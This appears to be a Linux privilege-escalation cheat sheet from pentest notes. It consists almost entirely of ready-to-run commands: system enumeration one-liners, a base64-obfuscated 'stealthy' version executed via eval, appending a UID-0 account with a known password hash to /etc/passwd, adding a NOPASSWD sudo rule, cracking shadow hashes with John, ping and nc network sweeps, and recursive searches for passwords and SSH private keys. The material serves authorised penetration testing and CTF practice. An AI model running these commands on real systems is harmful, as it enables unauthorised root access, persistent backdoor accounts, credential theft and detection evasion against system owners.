Enumeration

Checklist - Linux Privilege Escalation - HackTricks

Get the Distribution Codename

lsb_release -cs

Check EOL
Check ExploitDB
Check PacketStorm
Check Kernel CVE
Check CVE Details

One liners

You can create one liners with commands like

grep "sh$" /etc/passwd

env

sudo -l

hostname -I

 uname -a

ifconfig

getcap -r / 2>/dev/null

find / -perm -4000 -or -perm -2000 2>/dev/null

(echo "###MARKER###_env"; env; echo "###MARKER###_sudo -l"; sudo -l; echo "###MARKER###_hostname -I"; hostname -I; echo "###MARKER###_ifconfig"; ifconfig; echo "###MARKER###_mount"; mount; echo "###MARKER###_uname -a"; uname -a; echo "###MARKER###_getcap"; timeout 10 getcap -r / 2>/dev/null; echo "###MARKER###_suid/guid"; timeout 10 find / -perm -4000 -or -perm -2000 2>/dev/null) | sed -n 's/^###MARKER###_\(.*\)$/=== \1 ===\n/p; t; p'

Stealthy Version Splitting Variables

a='ZWNobyAiJCRfZW52IjtlbnY7ZWNobyAiJCRfc3VkbyAtbCI7c3VkbyAtbDtlY2hvICIkX2hvc3RuYW1lIC1JIjtoc3RuYW1lIC1JO2VjaG8gIiRfaWZjb25maWciO2lmY29uZmlnO2VjaG8gIiRfbW91bnQiO21vdW50O2VjaG8gIiRfdW5hbWUgLWEiO3VuYW1lIC1hO2VjaG8gIiRfZ2V0Y2FwIjt0aW1lb3V0IDEwIGdldGNhcCAtciAvIDI+L2Rldi9udWxsO2VjaG8gIiRfZmluZCI7dGltZW91dCAxMCBmaW5kIC8gLXBlcm0gLTYwMDAgLW9yIC1wZXJtIC0yMDAwIDI+L2Rldi9udWxs'; b='c2VkIC1uICdzL15cJF9cKC4qXCkkLz09PSBcXDEgPT09L3A7IHQ7IHAn'; eval "$(echo $a | base64 -d)" | eval "$(echo $b | base64 -d)"

Check Groups

cat /etc/group

Check Ownership by group

find / -group management 2>/dev/null

adm group can read log files.

cat /var/log

Look for files owned for this group

find / -group adm 2>/dev/null

Check processes and Services

ps auxww

Read crontab file

cat /etc/crontab

Container processes

ps auxww | grep docker
ps auxww | grep lxd

Check Services running

ls /etc/init.d

If /proc is mounted with the hidepid option set to invisible the processes on the system are only visible to the current user and root users

mount | grep "/proc "

Check Listening ports

Show listening ports

netstat -tuln
netstat -tnl

Listen to the localhost

netstat -an -p tcp

/etc/passwd

Write Permissions

Generate the password hash

openssl passwd -1 tokyo

Add the line

echo 'tokyo:$1$iLayOiAd$8dHGiU.Qvk/uqjnoWzRpm/:0:0:tokyo:/root:/bin/bash' >> passwd

/etc/shadow

Crack the hash

Create the Hash file

echo 'zoe:$y$j9T$Ct0y5TNQ/sv95CFPz510O/$7YtCDOBISfngZeQ3rsDkRcw2XTFDgHBkxDpuhyBLNO1:1002:1002:zoe:/home/zoe:/bin/bash' > shadowHash.txt

With John

john --wordlist=~/Documents/Wordlists/rockyou.txt shadow.txt --format=crypt

/etc/sudoers

Try to read it

cat /etc/sudoers

If the file is read-only, you need to change its permissions to allow write access:

chmod +w /etc/sudoers

Add the following line:

yourUser   ALL=(ALL) NOPASSWD: ALL

Restore the original file permissions to make it read-only again:

chmod 440 /mnt/etc/sudoers

Scan the local network

Find one many hosts there are in the network by doing a ping sweep:

for i in {1..254}; do (ping -c 1 192.168.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

If nc is installed can be use to scan for open ports:

nc -zv 192.168.0.1 1-65535 2>&1 | grep -v refused | tee scan

UDP scan

nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused

`Nmap Binary`

Credential Hunting

Passwords

Search for the string pass (case-insensitive) in all files and directories recursively:

grep -iR "pass" * 2>/dev/null

Search for the string password in files with double extension, recursively:

grep password .*.* -r 2>/dev/null

Search for ssh keys recursively from the current directory you are in:

grep -iR -E "(ssh-(rsa|ed25519|dss|ecdsa|rsa1)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----)" * 2>/dev/null

`Hashes`

MD5 hashes

grep -aPo '[a-fA-F0-9]{32}' /DESIRED/PATH

SHA-1

grep -aPo '[a-fA-F0-9]{40}' /DESIRED/PATH

SHA-256

grep -aPo '[a-fA-F0-9]{64}' /DESIRED/PATH

SHA-512

grep -aPo '[a-fA-F0-9]{128}' /DESIRED/PATH

PreviousStatic Binaries NextFile Transfer

Last updated 2 hours ago